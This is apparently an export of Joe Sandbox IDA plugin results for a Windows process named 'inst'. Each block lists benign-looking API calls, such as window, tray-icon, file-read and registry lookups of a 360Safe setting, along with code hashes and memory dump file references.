                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesCreateDirectoryErrorFileH_prolog3Last_wcsrchr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2010142796-0
                                                                                                                                                                                                                      • Opcode ID: 5535fd92f6f832287ed9f1c6fc6d94ebb6e0dd852b558f378a03cdffc4b39cb4
                                                                                                                                                                                                                      • Instruction ID: 22b6e1a2478d7ed34997e8760ab76f1582f67347d18aacdf2b469c6591d7e69a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5535fd92f6f832287ed9f1c6fc6d94ebb6e0dd852b558f378a03cdffc4b39cb4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401F730B0411BE7CF217B719E4197E2BA0AF11B91F50442AF509EA191DB348C419791
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadIconW.USER32(000000CD), ref: 00AA6699
                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,00000284), ref: 00AA6703
                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,00000284), ref: 00AA670B
                                                                                                                                                                                                                      • SetTimer.USER32(?,00002711,000007D0,00000000), ref: 00AA671B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Icon$NotifyShell_$LoadTimer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2558709860-0
                                                                                                                                                                                                                      • Opcode ID: d1d0a012752b0550658c3fd8bf5f24ab634a7d146c9f47d98629742e7ccef788
                                                                                                                                                                                                                      • Instruction ID: cb4f862e1d17788692be4be9d623588f800ada202062c720e0792f57f638d48c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1d0a012752b0550658c3fd8bf5f24ab634a7d146c9f47d98629742e7ccef788
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44016DB4501701DFE721CF74C888F97BBF9EB49748F00482EE6A9A7281C7B56954CB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AB35AF
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB35C0
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00AB35C9
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00AB35D6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LongWindow$CurrentFocusThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2448781475-0
                                                                                                                                                                                                                      • Opcode ID: 36b5cce4d421686343fd044337d9849ef717f72c26ff3f477ebe1782cc96832c
                                                                                                                                                                                                                      • Instruction ID: 5e4f11c09be52549cfebe839267630204682738c1fc11c24be48688a78fa9c01
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36b5cce4d421686343fd044337d9849ef717f72c26ff3f477ebe1782cc96832c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAF0FC71514610AFD725A760CD05EDF76ACEF05310B108618B82793191DF30EE01DA55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsWindow.USER32 ref: 00AC14C3
                                                                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 00AC14D0
                                                                                                                                                                                                                      • PostMessageW.USER32(?,000008C7,?,?), ref: 00AC14F3
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AC1500
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$EnabledInvalidateMessagePostRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2423392173-0
                                                                                                                                                                                                                      • Opcode ID: 6f52d9390b186199b6bdc681d18d2e88776d9363316b45303e21d4c5ee1b9c76
                                                                                                                                                                                                                      • Instruction ID: f2546bcdf198d0a26aa64b9a26130bc3f0ab2bc0b3a751263115b75ffa74a6a1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f52d9390b186199b6bdc681d18d2e88776d9363316b45303e21d4c5ee1b9c76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBF03A71210B10EBFB325B65DC09FA67BA5BB00705F00081CF2A2DA5A1DAA6E811DBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00AFE99E
                                                                                                                                                                                                                        • Part of subcall function 00B030A0: __FindPESection.LIBCMT ref: 00B030FB
                                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 00AFE9AE
                                                                                                                                                                                                                      • __freeptd.LIBCMT ref: 00AFE9B8
                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 00AFE9C1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3182216644-0
                                                                                                                                                                                                                      • Opcode ID: 7b4bf1bba2ee6583c52aeba4c7931c3f0e40da8f9272d3170e4596da5eaa60f1
                                                                                                                                                                                                                      • Instruction ID: 1ff92fb2cca111b05220bd2afe4c1652ed7afa5024128152c75602fb9f79418e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b4bf1bba2ee6583c52aeba4c7931c3f0e40da8f9272d3170e4596da5eaa60f1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAD0E261000A09AAEA2477A5ED5AB297AD99B81760F340060BA44A20F1DFF4D8D1C966
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6C5EAD6C
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6C5EAD82
                                                                                                                                                                                                                        • Part of subcall function 6C5EAB57: __EH_prolog3.LIBCMT ref: 6C5EAB5E
                                                                                                                                                                                                                        • Part of subcall function 6C5EAB57: CreateXMLDOMDocument.SITES(00000000,0000003C,6C5EAD96,?,?,Config\SafeIME.xml), ref: 6C5EAB88
                                                                                                                                                                                                                        • Part of subcall function 6C5EAB57: VariantClear.OLEAUT32(?), ref: 6C5EABD3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClearCombineCreateDocumentH_prolog3PathVariant_memset
                                                                                                                                                                                                                      • String ID: Config\SafeIME.xml
                                                                                                                                                                                                                      • API String ID: 3506927742-2267017868
                                                                                                                                                                                                                      • Opcode ID: 30589d21f029f6f26b4b85b154c52cba2609fd14c5baba92ae6616d656b38984
                                                                                                                                                                                                                      • Instruction ID: 0564e0e79551630666d541fe4620747c603c6117e61ea28300160ca1afd3dfe7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30589d21f029f6f26b4b85b154c52cba2609fd14c5baba92ae6616d656b38984
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F01271A01119ABCF60EF649C45F99B7F8AB09608F0045AAA185A6680DE709A4C8BE9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetValueW.SHLWAPI(80000001,Software\360Safe,EnableUE,?,00000000,?,&pid=,&ver=), ref: 00AB670E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                      • String ID: EnableUE$Software\360Safe
                                                                                                                                                                                                                      • API String ID: 3702945584-3756293347
                                                                                                                                                                                                                      • Opcode ID: 661bd4e8e7fe7b35d1d96a4e38cf71aea30368f90d0367eca4fa8ba1102dc358
                                                                                                                                                                                                                      • Instruction ID: a576d03ca888e449f7db4196183a382ac45da40fcb221428cb54a6b1b37bccbb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 661bd4e8e7fe7b35d1d96a4e38cf71aea30368f90d0367eca4fa8ba1102dc358
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DE06D72E40208FADB00DBA09C01BCEB7FCAB04715F2081B6A112E2080EA70D744DB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message_memset
                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                      • API String ID: 2116056029-3993045852
                                                                                                                                                                                                                      • Opcode ID: 4360712ead88554495c43acd2c3c7bfed7a8f35959caafe46a00016fa1be147e
                                                                                                                                                                                                                      • Instruction ID: 989bb362c05c924ee2e97acc4088de5a1e9d2c28826388f4dbc613825ff302be
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4360712ead88554495c43acd2c3c7bfed7a8f35959caafe46a00016fa1be147e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AE0B8719002189BDB10EB95DD45BDF77F8DB4C714F100155E615B7180D776ED048BE5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(SitesUI), ref: 6C639C34
                                                                                                                                                                                                                      • SmartDisableIME.SITES ref: 6C639C3F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardDisableFormatRegisterSmart
                                                                                                                                                                                                                      • String ID: SitesUI
                                                                                                                                                                                                                      • API String ID: 3315930252-1048294868
                                                                                                                                                                                                                      • Opcode ID: 381b62a3a09282fbe3c8dd14bec057c6622a88638d47bfcd9fa8be711fdaabfe
                                                                                                                                                                                                                      • Instruction ID: 26172ec853a0f1a657a20aa2f994dae6ae5759e38eb1c3c53e0e35ebbe8cabf7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 381b62a3a09282fbe3c8dd14bec057c6622a88638d47bfcd9fa8be711fdaabfe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14D0C9B0B05618CAEB149F228048B8875B1A74730DF40B62EC00557A40CF7A40488F19
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                                                                      • Opcode ID: cf3f95e98b7fcd95740d9ef7e8e05e76240ad777584e0de849f2030faebb0621
                                                                                                                                                                                                                      • Instruction ID: 029f40826f29907a4b78d1003008ddd1f4246b30770b191a0b8d1f423583633a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3f95e98b7fcd95740d9ef7e8e05e76240ad777584e0de849f2030faebb0621
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9E15975E0060AEFCF14EFA4C981AEDBBF5BF18300F10452DE556A7691EB30AA55CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00A728B3
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00A729B5
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000008,00002000,?,00000000), ref: 00A729C5
                                                                                                                                                                                                                        • Part of subcall function 00A75690: _malloc.LIBCMT ref: 00A7569C
                                                                                                                                                                                                                        • Part of subcall function 00A75690: SetLastError.KERNEL32(00000008,00000000,00A7291E,00000000,00002000,?,00000000), ref: 00A756AE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast_malloc$_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1834304950-0
                                                                                                                                                                                                                      • Opcode ID: 1e202c88c4539fb3b7d18effd02d937852d6f5e7a8127cc940755109d2bb7cf5
                                                                                                                                                                                                                      • Instruction ID: 3975ccbfa5849fe06e9c3acc6dafb015ffe0a2bd868bd0a127dadd081e8bee13
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e202c88c4539fb3b7d18effd02d937852d6f5e7a8127cc940755109d2bb7cf5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EB162B19083018BD721DF29D981B6BB7E4ABC8754F04CA2DF99D87241E770E949CB93
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A74CF6
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000008,?,00000000,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A74D13
                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A74D98
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Pointer$Read
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2010065189-0
                                                                                                                                                                                                                      • Opcode ID: 0425f28acb98bee188f6384156cc6763b19b7b553e5f78de9ee4a3c70729b1f2
                                                                                                                                                                                                                      • Instruction ID: 93fd055900755f7a28bcf539b72877c82e3f6d8fab7f34b58e3742feb7594bcc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0425f28acb98bee188f6384156cc6763b19b7b553e5f78de9ee4a3c70729b1f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2313571608301ABD320DF559D81A2BB7E8FB8CB48F40C92DF59997291EB70DD048B93
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 00AB5EB3
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 00AB5EDA
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,?), ref: 00AB5EE9
                                                                                                                                                                                                                        • Part of subcall function 00AB5E24: CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB5E36
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Long$CallProc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 513923721-0
                                                                                                                                                                                                                      • Opcode ID: ecd4d3b8f7041ea7c21d1d7e43f33e92975287399471064be57017b069056f17
                                                                                                                                                                                                                      • Instruction ID: fd1b6edaa759323d384324ebd64273f55620a19e710a0fc595ae7fb7e79c85d8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecd4d3b8f7041ea7c21d1d7e43f33e92975287399471064be57017b069056f17
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4313C71900605EFCF21DF69C8809AABBF9FF48710B108919F966972A1D731EA51DF60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 00AC2EB2
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 00AC2ED9
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,?), ref: 00AC2EE8
